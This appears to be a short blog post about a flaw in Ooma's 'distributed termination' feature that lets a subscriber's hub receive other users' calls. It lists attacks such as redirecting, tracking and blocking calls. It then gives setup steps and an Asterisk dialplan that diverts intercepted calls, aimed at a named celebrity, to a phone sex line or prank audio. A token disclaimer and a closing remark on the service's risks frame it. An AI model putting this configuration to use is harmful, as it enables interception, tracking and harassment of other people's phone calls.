If we assume that ooma's "creative director" eats the company dog food and uses ooma, then a call made by the former TV star may eventually be directed through our ooma hub, as a result of the company's patent-pending "distributed termination." This feature can be exploited by attackers to perform various attacks, including:
- Redirecting phone calls placed by the user to different phone numbers of the attacker’s choosing
- Tracking phone calls placed by the user
- Preventing the phone from dialing
Plug the output of the Ooma hub that is supposed to connect to your landline into an ATA registered to your Asterisk server.
Assume that this ATA registers as "oomahub" to your server and inbound calls arrive at the context "ooma-in". In extensions.conf we may find something like this:
[ooma-in]
exten => _XXXXXXX.,1,Goto(ooma-prank,s,1)
[ooma-prank]
exten => s,1,SetVar(X=$[${EPOCH} % 10])
exten => s,2,Goto(ooma-prank,prank-${X},1)
; The call will be directed to prank-0 thru prank-9
; prank 0 - send Ashton to a phone sex line
exten => prank-0,1,Answer
exten => prank-0,2,Dial(SIP/18007232868@tf.voipmich.com)
exten => prank-0,3,Hangup
; prank 1 - play audio clip from Ashton's classic "My Boss's Daughter"
exten => prank-1,1,Answer
exten => prank-1,2,MP3Player(music/MyBossDaughter.mp3)
exten => prank-1,3,Hangup
; ... other pranks here
Of course you know that this information is provided purely for entertainment purposes and nobody should actually do this, right?
However, it does point out some of the risks associated with using ooma's service.